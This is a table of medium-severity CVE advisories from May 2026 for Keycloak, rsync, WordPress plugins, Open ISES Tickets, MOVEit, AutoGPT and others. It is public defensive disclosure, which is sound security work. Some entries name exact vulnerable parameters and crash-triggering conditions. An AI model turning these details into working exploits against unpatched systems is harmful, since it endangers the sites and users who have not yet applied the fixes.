| openises–tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in opena.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_call GET parameter directly into page output. Attackers can craft a malicious URL containing a JavaScript payload in the frm_call parameter that executes in the victim’s browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35011 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-opena-php-frm-call-parameter |
| openises–tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in add_facnote.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into a hidden input field VALUE attribute. Attackers can craft a malicious URL containing a JavaScript payload in the ticket_id parameter that executes in the victim’s browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35012 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-add-facnote-php-ticket-id-parameter |
| openises–tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in street_view.php that allows authenticated attackers to inject arbitrary JavaScript by passing unsanitized values through the thelat and thelng GET parameters directly into JavaScript variable assignments. Attackers can craft a malicious URL containing a JavaScript payload in either parameter that executes in the victim’s browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35013 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-street-view-php-thelat-and-thelng-parameters |
| openises–tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in routes_nm.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into a hidden input field VALUE attribute. Attackers can craft a malicious URL containing a JavaScript payload in the ticket_id parameter that executes in the victim’s browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35014 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-routes-nm-php-ticket-id-parameter |
| openises–tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in do_unit_mail.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the the_ticket GET parameter directly into a JavaScript variable assignment. Attackers can craft a malicious URL containing a JavaScript payload in the the_ticket parameter that executes in the victim’s browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35015 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-do-unit-mail-php-the-ticket-parameter |
| openises–tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in search.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_query POST parameter directly into an HTML input field VALUE attribute. Attackers can craft a malicious request containing a JavaScript payload in the frm_query parameter that executes in the victim’s browser when submitted. | 2026-05-20 | 4.6 | CVE-2026-35016 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-search-php-frm-query-parameter |
| opensourcepos–Open Source Point of Sale | A vulnerability was detected in opensourcepos Open Source Point of Sale up to 3.4.2. This issue affects the function getPicThumb of the file app/Controllers/Items.php. The manipulation of the argument pic_filename results in path traversal. The attack may be launched remotely. The patch is identified as def0c27a0e252668df8d942fc31e16d1edfd7323. A patch should be applied to remediate this issue. The vendor was contacted early about this disclosure. | 2026-05-18 | 4.3 | CVE-2026-8802 | VDB-364435 | opensourcepos Open Source Point of Sale Items.php getPicThumb path traversal VDB-364435 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #802559 | opensourcepos Open Source Point of Sale 3.4.1 Path Traversal https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-xq63-3v4g-39r5 https://github.com/opensourcepos/opensourcepos/pull/4545 https://github.com/opensourcepos/opensourcepos/commit/def0c27a0e252668df8d942fc31e16d1edfd7323 |
| owencutajar–SponsorMe | The SponsorMe plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PHP_SELF Parameter in all versions up to, and including, 0.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. The PHP_SELF value is reflected in two separate locations within the vulnerable function – a form action attribute and an anchor href attribute – both of which can be exploited by appending a crafted payload to the wp-admin/admin.php URL path. | 2026-05-20 | 6.1 | CVE-2026-8626 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7df7f541-b8aa-46fa-bfca-b333beea27f9?source=cve https://plugins.trac.wordpress.org/browser/sponsorme/trunk/sponsorme.php#L440 https://plugins.trac.wordpress.org/browser/sponsorme/trunk/sponsorme.php#L475 |
| pftool–Alfie Feed Plugin | The Alfie – Feed Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.1. This is due to missing nonce validation on the alfie_manage() function which handles feed deletion via the ‘delete’ GET parameter. This makes it possible for unauthenticated attackers to delete arbitrary plugin feed data (from alfie_colindex, alfie_producten, alfie_reactions, and alfie_searchproduct tables) via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-22 | 4.3 | CVE-2026-4070 | https://www.wordfence.com/threat-intel/vulnerabilities/id/af36719a-8f7d-46dc-a697-cfcbb08e45e2?source=cve https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/trunk/include/alfie-manage.php#L60 https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/tags/1.2.1/include/alfie-manage.php#L60 https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/trunk/include/alfie-manage.php#L58 https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/tags/1.2.1/include/alfie-manage.php#L58 |
| PowerDNS–Authoritative | Insufficient Validation of Names During AXFR | 2026-05-21 | 6.8 | CVE-2026-42000 | https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html |
| PowerDNS–Authoritative | Concurrency and locking defects in GSS-TSIG | 2026-05-21 | 5.9 | CVE-2026-42002 | https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html |
| PowerDNS–Authoritative | Incorrect Behaviour of Views with TCP PROXY Requests | 2026-05-21 | 4.8 | CVE-2026-41999 | https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html |
| PowerDNS–Authoritative | Insufficient Validation of Member Zone Data May Cause Catalog Zone Transfer to Fail | 2026-05-21 | 4.9 | CVE-2026-42396 | https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html |
| Progress Software–MOVEit Automation | Incorrect default permissions vulnerability in Progress Software MOVEit Automation allows Retrieve Embedded Sensitive Data. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7. | 2026-05-20 | 6.5 | CVE-2026-8487 | https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html |
| Progress Software–MOVEit Automation | Uncontrolled Memory Allocation vulnerability in Progress Software MOVEit Automation allows Excessive Allocation. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7. | 2026-05-20 | 5.9 | CVE-2026-8485 | https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html |
| Progress Software–MOVEit Automation | Allocation of resources without limits or throttling vulnerability in Progress Software MOVEit Automation allows Flooding. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7. | 2026-05-20 | 5.3 | CVE-2026-8486 | https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html |
| Progress Software–MOVEit Automation | Allocation of resources without limits or throttling vulnerability in Progress Software MOVEit Automation allows Excessive Allocation. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7. | 2026-05-20 | 4.3 | CVE-2026-8488 | https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html |
| QuantumNous–new-api | A weakness has been identified in QuantumNous new-api up to 0.12.1. The impacted element is the function SearchUserTopUps/SearchAllTopUps of the file model/topup.go of the component self Endpoint. This manipulation causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 6.3 | CVE-2026-9305 | VDB-365252 | QuantumNous new-api self Endpoint topup.go SearchAllTopUps sql injection VDB-365252 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #812192 | QuantumNous new-api [Needs Manual Input] SQL Injection (CWE-89) Submit #812195 | QuantumNous new-api 0.12.1 Improper Neutralization of Data Query Logic (CWE-943) (Duplicate) https://gist.github.com/YLChen-007/cf501d0a66c81298b2f97e854f3813db |
| rdbeach–BLOGCHAT Chat System | The BLOGCHAT Chat System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.6.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 6.1 | CVE-2026-8420 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a62186aa-19aa-445b-8fdc-b029bdafd58f?source=cve https://plugins.trac.wordpress.org/browser/blogchat-chat-system/trunk/wp-blogchat-widget.php#L208 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/tags/1.3.6.3/wp-blogchat-widget.php#L208 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/trunk/wp-blogchat-widget.php#L215 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/tags/1.3.6.3/wp-blogchat-widget.php#L215 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/trunk/wp-blogchat-widget.php#L222 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/tags/1.3.6.3/wp-blogchat-widget.php#L222 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/trunk/wp-blogchat-widget.php#L293 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/tags/1.3.6.3/wp-blogchat-widget.php#L293 |
| Red Hat–Red Hat Build of Keycloak | A flaw was found in Keycloak. The cross-session verification proof is keyed only by (local userId, idpAlias) and is not bound to the upstream identity that was actually verified, so a second upstream account on the same IdP can consume it and get linked to the victim’s local account. | 2026-05-20 | 6.4 | CVE-2026-9087 | https://access.redhat.com/security/cve/CVE-2026-9087 RHBZ#2480172 |
| Red Hat–Red Hat Build of Keycloak | A flaw was found in Keycloak. When both realm-level and client-level `notBefore` revocation policies are configured, Keycloak’s OpenID Connect (OIDC) Introspection feature fails to properly honor the realm-level policy. This allows tokens that should have been revoked to remain active, potentially leading to unauthorized access or continued session validity. This could impact the security of systems utilizing Keycloak for identity and access management. | 2026-05-19 | 5.4 | CVE-2026-8922 | https://access.redhat.com/security/cve/CVE-2026-8922 RHBZ#2479586 |
| Red Hat–Red Hat Build of Keycloak | A flaw was found in Keycloak. An authenticated user can bypass configured WebAuthn policies during credential registration by manipulating client-side JavaScript. This occurs because the server-side processAction() fails to validate that the newly created credential’s parameters, such as public key algorithms, match the realm’s configured WebAuthn policies. This could lead to the creation of credentials that do not adhere to administrative security requirements, potentially weakening the overall security posture of the system by allowing non-compliant authentication methods. | 2026-05-19 | 4.3 | CVE-2026-8830 | https://access.redhat.com/security/cve/CVE-2026-8830 RHBZ#2479565 |
| Red Hat–Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. This access control vulnerability in Keycloak’s OpenID Connect (OIDC) token introspection endpoint allows a confidential client to bypass audience restrictions. An attacker-controlled client with valid credentials can retrieve sensitive token claims intended for other resource servers, compromising the confidentiality of lightweight access tokens. This issue can be exploited remotely by any confidential client in the realm with valid credentials. | 2026-05-19 | 6.5 | CVE-2026-37979 | RHSA-2026:19596 RHSA-2026:19597 https://access.redhat.com/security/cve/CVE-2026-37979 RHBZ#2455328 |
| Red Hat–Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. This authentication vulnerability allows a remote attacker to replay `ExecuteActionsActionToken` tokens within Keycloak’s WebAuthn (Web Authentication) flow. By intercepting an execute-actions email link, an attacker can register their own authenticator to a victim’s account. This leads to unauthorized enrollment of a hardware-backed credential, enabling persistent account takeover. | 2026-05-19 | 6.8 | CVE-2026-37982 | RHSA-2026:19596 RHSA-2026:19597 https://access.redhat.com/security/cve/CVE-2026-37982 RHBZ#2455329 |
| Red Hat–Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. An authenticated client could exploit an Insecure Direct Object Reference (IDOR) vulnerability in the Authorization Services Protection API endpoint. By knowing or obtaining a resource’s unique identifier (UUID) belonging to another Resource Server within the same realm, the client could bypass authorization checks. This allows the client to perform unauthorized GET, PUT, and DELETE operations on resources, leading to information disclosure and potential unauthorized modification or deletion of data. | 2026-05-19 | 6.8 | CVE-2026-4630 | RHSA-2026:19596 RHSA-2026:19597 https://access.redhat.com/security/cve/CVE-2026-4630 RHBZ#2450245 |
| Red Hat–Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. A low-privilege administrator with the ‘view-clients’ role can exploit this by invoking the ‘evaluate-scopes’ Admin API endpoints with an arbitrary user ID (userId) parameter. This vulnerability allows for cross-role personally identifiable information (PII) leakage, enabling unauthorized visibility into user identities and authorizations across the realm. Exploitation is possible remotely via network access to the Admin API. | 2026-05-19 | 4.9 | CVE-2026-37978 | RHSA-2026:19596 RHSA-2026:19597 https://access.redhat.com/security/cve/CVE-2026-37978 RHBZ#2455327 |
| Red Hat–Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. A broken access control vulnerability in the Account Resources user lookup endpoint allows a remote authenticated user, who owns at least one User-Managed Access (UMA) resource, to enumerate and harvest personally identifiable information (PII) for all realm users. By sending crafted requests with arbitrary usernames or email values, the endpoint returns full profile objects for unrelated users. This leads to broad profile-level information disclosure. | 2026-05-19 | 4.3 | CVE-2026-37981 | RHSA-2026:19596 RHSA-2026:19597 https://access.redhat.com/security/cve/CVE-2026-37981 RHBZ#2455326 |
| Red Hat–Red Hat Enterprise Linux 10 | A flaw was found in libsolv. This heap buffer overflow vulnerability occurs when a victim processes a specially crafted `.solv` file containing negative size values in the `repo_add_solv` function. This leads to an undersized memory allocation and a subsequent out-of-bounds write. An attacker could exploit this to cause a denial of service (DoS). | 2026-05-20 | 6.5 | CVE-2026-9149 | https://access.redhat.com/security/cve/CVE-2026-9149 RHBZ#2460380 https://github.com/openSUSE/libsolv/pull/617 |
| Red Hat–Red Hat Enterprise Linux 10 | A flaw was found in libsolv. This stack-based buffer overflow vulnerability occurs in libsolv’s Debian metadata parser when processing specially crafted Debian repository metadata. An attacker could exploit this by providing malicious SHA384 or SHA512 checksum tags, leading to memory corruption and a denial of service (DoS) in the affected system. | 2026-05-20 | 6.5 | CVE-2026-9150 | https://access.redhat.com/security/cve/CVE-2026-9150 RHBZ#2460379 https://github.com/openSUSE/libsolv/pull/616 |
| registrationformbuilder–Vedrixa Forms User Registration Form, Signup Form & Drag & Drop Form Builder | The Vedrixa Forms – User Registration Form, Signup Form & Drag & Drop Form Builder plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.1.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to overwrite the structure of any form – adding, removing, or altering fields – by writing attacker-controlled data to the plugin’s FORMS database table. The ‘ajax-nonce’ nonce used by this handler is injected into the public frontend via wp_localize_script(), so any authenticated user who visits a page containing a form shortcode can obtain it without any elevated access. | 2026-05-22 | 4.3 | CVE-2026-8692 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1b3b8a6c-1c84-4abe-ad4a-02302b04987b?source=cve https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.1.1/admin/class-registration-form-builder-admin.php#L866 https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.1.1/includes/class-registration-form-builder.php#L174 https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.1.1/public/class-registration-form-builder-public.php#L121 https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.0.0/admin/class-registration-form-builder-admin.php#L866 https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.0.0/includes/class-registration-form-builder.php#L174 https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.0.0/public/class-registration-form-builder-public.php#L121 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3540543%40vedrixa-forms-registration-builder&new=3540543%40vedrixa-forms-registration-builder&sfp_email=&sfph_mail= |
| Revolution Slider–Slider Revolution | The Slider Revolution plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.0.9 via the ‘get_stream_data()’ function. This makes it possible for unauthenticated attackers to extract sensitive data including published password-protected post, page, and product content. | 2026-05-20 | 5.3 | CVE-2026-6728 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3cd7be2c-9ba9-4d25-8907-610898df5834?source=cve https://www.sliderrevolution.com/changelog/ |
| RsyncProject–rsync | Rsync version 3.4.2 and prior contain symlink race condition vulnerabilities in path-based system calls including chmod, lchown, utimes, rename, unlink, mkdir, symlink, mknod, link, rmdir, and lstat that allow local attackers to redirect operations to files outside the exported rsync module. Attackers with local filesystem access can exploit the timing window between path resolution and syscall execution by swapping symlinks to apply sender-supplied permissions, ownership, timestamps, or filenames to arbitrary files outside the intended module boundary on rsync daemons configured with ‘use chroot = no’. | 2026-05-20 | 6.3 | CVE-2026-43619 | https://github.com/RsyncProject/rsync/security/advisories/GHSA-4h9m-w5ff-j735 https://github.com/RsyncProject/rsync/releases/tag/v3.4.3 https://www.vulncheck.com/advisories/rsync-symlink-race-condition-via-path-based-syscalls |
| RsyncProject–rsync | Rsync version 3.4.2 and prior contain a receiver-side out-of-bounds array read vulnerability in recv_files() in receiver.c that allows a malicious rsync server to crash the rsync client process. Attackers can exploit the vulnerability by setting CF_INC_RECURSE in compatibility flags and sending a specially crafted file list where the first sorted entry is not the leading dot directory, followed by a transfer record with ndx=0 and an iflag word without ITEM_TRANSFER, causing the receiver to read 8 bytes before the allocated pointer array and dereference an invalid pointer at an unmapped address, resulting in a deterministic SIGSEGV crash of the rsync client. | 2026-05-20 | 6.5 | CVE-2026-43620 | https://github.com/RsyncProject/rsync/security/advisories/GHSA-28pw-r563-rxvm https://github.com/RsyncProject/rsync/releases/tag/v3.4.3 https://www.vulncheck.com/advisories/rsync-out-of-bounds-array-read-via-recv-files |
| RsyncProject–rsync | Rsync version 3.4.2 and prior contain an authorization bypass vulnerability in the rsync daemon’s hostname-based access control list enforcement when configured with chroot. Attackers can bypass hostname-based deny rules by controlling the PTR record for their source IP address, allowing connections from hostnames that administrators intended to deny when reverse DNS resolution fails and defaults to UNKNOWN. | 2026-05-20 | 4.8 | CVE-2026-43617 | https://github.com/RsyncProject/rsync/security/advisories/GHSA-rjfm-3w2m-jf4f https://github.com/RsyncProject/rsync/releases/tag/v3.4.3 https://www.vulncheck.com/advisories/rsync-authorization-bypass-via-hostname-resolution |
| Samsung Open Source–Escargot | Uncontrolled Recursion vulnerability in Samsung Open Source Escargot allows Oversized Serialized Data Payloads. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47309 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source–Escargot | Release of invalid pointer or reference vulnerability in Samsung Open Source Escargot allows Buffer Manipulation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47312 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source–Escargot | Memory allocation with excessive size value vulnerability in Samsung Open Source Escargot allows Excessive Allocation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47313 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source–Escargot | Improper Check for Unusual or Exceptional Conditions vulnerability in Samsung Open Source Escargot allows Input Data Manipulation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47315 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source–Escargot | Improper Check or Handling of Exceptional Conditions vulnerability in Samsung Open Source Escargot allows Input Data Manipulation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47316 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source–Escargot | Uncontrolled Recursion vulnerability in Samsung Open Source Escargot allows Excessive Allocation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47317 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source–Walrus | NULL pointer dereference vulnerability in Samsung Open Source Walrus allows an attacker to cause a denial of service via a crafted WebAssembly module containing deeply nested instructions. This issue affects Walrus: f339b8ee4ea701772e8ae640b3d1b12ac02b1ae9. | 2026-05-19 | 5.5 | CVE-2026-47307 | https://github.com/Samsung/walrus/pull/409 |
| Samsung Open Source–Walrus | NULL pointer dereference vulnerability in Samsung Open Source Walrus allows Pointer Manipulation. This issue affects Walrus: f339b8ee4ea701772e8ae640b3d1b12ac02b1ae9. | 2026-05-19 | 5.5 | CVE-2026-47308 | https://github.com/Samsung/walrus/pull/409 |
| shapedplugin–Location Weather WordPress Weather Forecast, AQI, Temperature and Weather Widget | The Location Weather plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the `splw_update_block_options()` and `lwp_clean_weather_transients()` functions in all versions up to, and including, 3.0.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to disable all weather blocks and purge all weather cache transients. The nonce required for these actions is exposed to all authenticated users via `wp_localize_script()` on the `init` hook. | 2026-05-22 | 4.3 | CVE-2026-7249 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d472011d-1623-4791-9d56-715d90fe0469?source=cve https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.2/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L256 https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.2/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L331 https://wordpress.org/plugins/location-weather/ https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.3/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L256 https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.3/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L332 |
| Significant-Gravitas–AutoGPT | AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. In versions 0.1.0 through 0.6.51, SendEmailBlock in autogpt_platform/backend/backend/blocks/email_block.py accepts a user-supplied smtp_server (string) and smtp_port (integer) as per-execution block inputs, then passes them directly to Python’s smtplib.SMTP() to open a raw TCP connection with no IP address validation. This completely bypasses the platform’s hardened SSRF protections in backend/util/request.py – the validate_url_host() function and BLOCKED_IP_NETWORKS blocklist that every other block uses to block connections to private, loopback, link-local, and cloud metadata addresses. An authenticated user on a shared AutoGPT deployment can use this to perform non-blind internal network port scanning and service fingerprinting: smtplib reads the target’s TCP banner on connect and embeds it in the exception message, which is persisted as user-visible block output via the execution framework. This issue has been fixed in version 0.6.52. | 2026-05-19 | 5 | CVE-2026-33234 | https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-4jwj-6mg5-wrwf https://github.com/Significant-Gravitas/AutoGPT/releases/tag/autogpt-platform-beta-v0.6.52 |
| simonholliday–Anomify AI Anomaly Detection and Alerting | The Anomify AI – Anomaly Detection and Alerting plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘anomify_api_key’ parameter in versions up to and including 0.3.6. This is due to insufficient input sanitization and missing output escaping: the plugin applies sanitize_text_field() to the Metric Data Key input before saving it via update_option(), but sanitize_text_field() strips HTML tags without encoding double-quote characters, and the value is then echoed directly into an HTML attribute context (value=”…”) without esc_attr(). This makes it possible for authenticated attackers with administrator-level access to inject arbitrary web scripts that execute whenever a user visits the plugin’s settings page. | 2026-05-20 | 4.4 | CVE-2026-6404 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4036057c-0c43-4d9c-97db-4861d91a4daa?source=cve https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Wp/includes/admin_options.php#L43 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Wp/includes/admin_options.php#L43 https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Wp/Admin.php#L32 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Wp/Admin.php#L32 https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Config.php#L152 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Config.php#L152 |
| simonholliday–Anomify AI Anomaly Detection and Alerting | The Anomify AI – Anomaly Detection and Alerting plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) leading to Stored Cross-Site Scripting (XSS) in versions up to and including 0.3.6. This is due to missing nonce verification on the settings page handler and insufficient output escaping in the admin_options.php template. The settings form includes no wp_nonce_field() and the handler performs no check_admin_referer() check, meaning any cross-origin POST can modify plugin settings. The API key field is sanitized only with sanitize_text_field(), which strips HTML tags but does not encode double-quote characters; the value is then rendered into an HTML attribute via bare echo without esc_attr(), allowing a double-quote attribute-escape payload to survive both sanitization and storage. This makes it possible for unauthenticated attackers to inject arbitrary web scripts by tricking a logged-in administrator into visiting a malicious page that submits a forged request, storing the payload in the database and causing it to execute in the administrator’s browser whenever the plugin settings page is visited. | 2026-05-20 | 4.3 | CVE-2026-6405 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a1e02c2d-a38a-495c-9c37-098049297be2?source=cve https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Wp/includes/admin_options.php#L43 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Wp/includes/admin_options.php#L43 https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Wp/Admin.php#L31 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Wp/Admin.php#L31 https://plugins.trac.wordpress.org/browser/anomify/trunk/Anomify/Config.php#L152 https://plugins.trac.wordpress.org/browser/anomify/tags/0.3.6/Anomify/Config.php#L152 |
| smub–All in One SEO Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic | The All in One SEO plugin for WordPress is vulnerable to Sensitive Information Exposure via ‘internalOptions’ localized script data in versions up to, and including, 4.9.7 due to sensitive internal option data being passed to wp_localize_script() in post editor contexts without effective masking for low-privilege users. This makes it possible for authenticated attackers, with contributor-level access and above, to view configured API/OAuth tokens and license-related values from page source. | 2026-05-20 | 4.3 | CVE-2026-5075 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0d8bc203-c17a-4b31-8f9e-695f9e638cda?source=cve https://plugins.trac.wordpress.org/changeset/3532318/all-in-one-seo-pack |
| smub–Photo Gallery, Sliders, Proofing and Themes NextGEN Gallery | The Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to and including 4.2.0. This is due to insufficient object-level authorization in the image deletion REST flow where the permission callback for DELETE /imagely/v1/images/{id} only checks ‘NextGEN Manage gallery’ permissions and does not enforce gallery ownership or ‘NextGEN Manage others gallery’ permissions. This makes it possible for authenticated attackers, with Subscriber-level privileges and ‘NextGEN Manage gallery’ capability, to delete gallery images belonging to other users as well as their associated image files from disk when deleteImg is enabled (default). | 2026-05-20 | 4.3 | CVE-2026-6566 | https://www.wordfence.com/threat-intel/vulnerabilities/id/439809ad-21ea-4a0b-b1fd-5de9f8f5ee7a?source=cve https://plugins.trac.wordpress.org/changeset/3533432/nextgen-gallery |
| smub–Slider by Soliloquy Responsive Image Slider for WordPress | The Slider by Soliloquy – Responsive Image Slider for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.8.1 via the map_meta_cap. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract draft slider metadata including unpublished media URLs, captions, and slider configuration authored by administrators or editors. | 2026-05-22 | 4.3 | CVE-2026-7636 | https://www.wordfence.com/threat-intel/vulnerabilities/id/54115a9a-dadd-4f18-a139-02ec89f0a571?source=cve https://plugins.trac.wordpress.org/browser/soliloquy-lite/trunk/includes/global/posttype.php#L90 https://plugins.trac.wordpress.org/browser/soliloquy-lite/trunk/includes/global/posttype.php#L177 https://plugins.trac.wordpress.org/browser/soliloquy-lite/tags/2.8.1/includes/global/posttype.php#L177 https://plugins.trac.wordpress.org/browser/soliloquy-lite/trunk/includes/global/posttype.php#L125 https://plugins.trac.wordpress.org/browser/soliloquy-lite/tags/2.8.1/includes/global/posttype.php#L125 https://plugins.trac.wordpress.org/browser/soliloquy-lite/tags/2.8.1/includes/global/posttype.php#L90 